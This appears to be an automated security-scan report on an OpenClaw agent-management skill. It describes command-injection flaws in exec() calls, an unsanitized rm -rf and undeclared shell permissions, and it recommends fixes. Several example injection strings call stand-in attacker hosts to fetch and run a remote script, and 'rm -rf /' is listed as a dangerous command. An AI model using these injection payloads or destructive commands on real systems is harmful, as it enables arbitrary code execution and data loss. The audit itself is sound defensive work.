Suspicious: risk score 50/100
Last scan: 22 hours ago
colmena-manager
Skill to manage and coordinate OpenClaw agents as a hive
Skill presents as a legitimate OpenClaw agent manager but contains multiple command-injection vulnerabilities from unsanitized user-controlled input piped into shell commands, with shell execution entirely undeclared in documentation.
Skill name: colmena-manager
Analysis time: 73.8s
Engine: pi
Verdict: use with caution
Do not deploy. Replace all exec() calls with parameterized APIs. Remove direct shell command construction. Add proper allowed-tools declarations. Audit agent.id and name inputs for shell metacharacters before use in any command context.

Attack chain (4 steps)

1. Privilege escalation: Attacker registers a malicious agent with shell metacharacters in the ID (e.g., 'vision; wget http://evil.com/sh.sh|bash')
   Location: src/index.js:12
2. Entry point: Victim runs 'colmena-manager health-check' to monitor the hive
   Location: src/index.js:120
3. Privilege escalation: healthCheck() calls exec() with ps aux | grep ${agent.id}, where agent.id contains unsanitized shell metacharacters from step 1
   Location: src/index.js:131
4. Impact: Shell injection executes arbitrary commands (download + execute remote script) with the permissions of the running user
   Location: src/index.js:131

Security findings (6)

Severity | Finding | Location

High: Command injection via agentId in multiple exec() calls [Code execution]
The agentId parameter (sourced from the agents_list API response) is directly interpolated into shell commands via template literals in three separate locations: logs() at line 66, healthCheck() at line 131, and checkMemory() at line 162. An attacker who registers a malicious agent with shell metacharacters in the ID (e.g., 'main; curl http://attacker.com') can achieve arbitrary command execution on the host when any of these commands are invoked.
Evidence: command: `tail -n ${lines} /home/nvi/.openclaw/sessions/${agentId}/logs.txt`
→ Validate agentId against a strict alphanumeric/whitelist pattern before using it in any shell command. Use OpenClaw's native session API instead of shell tail for log retrieval.
Location: src/index.js:66

High: Command injection via workspace name in rm -rf [Code execution]
The workspace name argument passed to workspaceRemove() is directly interpolated into an rm -rf shell command without sanitization. While the base path /home/nvi/.openclaw/workspace- provides some containment, path traversal sequences like '../../../' could escape the intended directory and delete arbitrary files on the system as the executing user.
Evidence: command: `rm -rf /home/nvi/.openclaw/workspace-${name}`
→ Validate the workspace name against a strict pattern (e.g., /^[a-z0-9-]+$/). Use Node.js fs.rmSync() with a verified absolute path instead of shell rm. Add a confirmation prompt before destructive operations.
Location: src/index.js:193

High: Shell execution completely absent from SKILL.md [Documentation deception]
SKILL.md's API section lists only OpenClaw native functions (agents_list, sessions_list, sessions_send, message, exec/process). It never discloses that exec() is used to run arbitrary shell commands (tail, ps, grep, awk, ls, mkdir, rm). Users deploying this skill have no indication that it requires shell:WRITE permissions or executes system commands.
Evidence: - `exec` / `process`: For health checks and system diagnostics
→ SKILL.md must explicitly declare the shell:WRITE permission and list each shell command used. Users must give informed consent before a skill can execute system commands.
Location: SKILL.md:55

Medium: Referenced HEARTBEAT.md does not exist [Documentation deception]
SKILL.md advertises an automatic heartbeat script (HEARTBEAT.md) that runs every 30 minutes for health monitoring. This file is referenced in both SKILL.md and README.md but does not exist in the project. This is either an incomplete feature or documentation that overstates capabilities.
Evidence: The skill includes a HEARTBEAT.md file that runs automatically every 30 minutes
→ Either implement HEARTBEAT.md or remove all references to it from the documentation. If implemented, declare its resource requirements explicitly.
Location: SKILL.md:64

Medium: No allowed-tools declaration despite full shell/filesystem access [Privilege escalation]
claws.json and SKILL.md do not declare any allowed-tools. The skill uses exec() for shell:WRITE operations (tail, ps, grep, awk, ls, mkdir, rm) and filesystem:WRITE operations (mkdir, rm -rf) across multiple methods. These permissions are entirely absent from any manifest, preventing the host AI from properly scoping the skill's capabilities.
Evidence: No 'allowedTools' or 'permissions' field present
→ Add an allowed-tools declaration to claws.json: {"tools": [{"name": "Bash", "resource": "shell", "level": "WRITE"}, {"name": "Write", "resource": "filesystem", "level": "WRITE"}]}
Location: claws.json:1

Low: Hardcoded /home/nvi/ path creates dependency on a specific user account [Sensitive access]
All file operations (logs, workspaces) hardcode /home/nvi/ as the base path. This is not declared as a prerequisite, and the path does not appear in SKILL.md requirements. The skill will silently fail on systems where this user does not exist.
Evidence: /home/nvi/.openclaw/sessions/${agentId}/logs.txt
→ Derive the OpenClaw data directory from an environment variable (e.g., OPENCLAW_HOME or XDG_DATA_HOME) or make it a configurable parameter.
Location: src/index.js:66
Resource type | Declared permission | Inferred permission | Status | Evidence
Command execution | NONE | WRITE | ✗ Exceeds declaration | src/index.js:66 exec with tail; src/index.js:131 exec with ps|grep; src/index.…
Filesystem | NONE | WRITE | ✗ Exceeds declaration | src/index.js:188 mkdir via exec; src/index.js:193 rm -rf via exec
Skill calls | NONE | READ | ✓ Consistent | src/index.js:13 agents_list, sessions_list, sessions_send (matches SKILL.md API…)
Indicators: 3 findings (1 critical)

Critical | Dangerous command | Dangerous shell command
rm -rf /
src/index.js:193

Medium | External URL | External URL
https://clawhub.com/colmena-manager
claws.json:15

Info | Email | Email address
[email protected]
claws.json:18

Directory structure

5 files · 14.1 KB · 552 lines
JavaScript: 1 file, 289 lines · Markdown: 2 files, 211 lines · JSON: 2 files, 52 lines
├─ src
│  └─ index.js (JavaScript, 289 lines, 7.9 KB)
├─ claws.json (JSON, 31 lines, 671 B)
├─ package.json (JSON, 21 lines, 470 B)
├─ README.md (Markdown, 36 lines, 1.1 KB)
└─ SKILL.md (Markdown, 175 lines, 4.0 KB)

Dependency analysis (1)

Package | Version | Source | Known vulnerabilities | Notes
openclaw | >=1.0.0 | npm (peer dep) | None known | Peer dependency, not bundled.

Security highlights

✓ Skill implements its stated functionality (agent management) without additional hidden data exfiltration
✓ No base64-encoded payloads or obfuscated code blocks found
✓ No credential harvesting from ~/.ssh, ~/.aws, or .env files
✓ No network requests to external IPs detected
✓ No reverse shell, C2, or data theft mechanisms present
✓ No cron/scheduled task persistence mechanisms found
✓ No malicious dependencies detected; package.json has minimal legitimate dependencies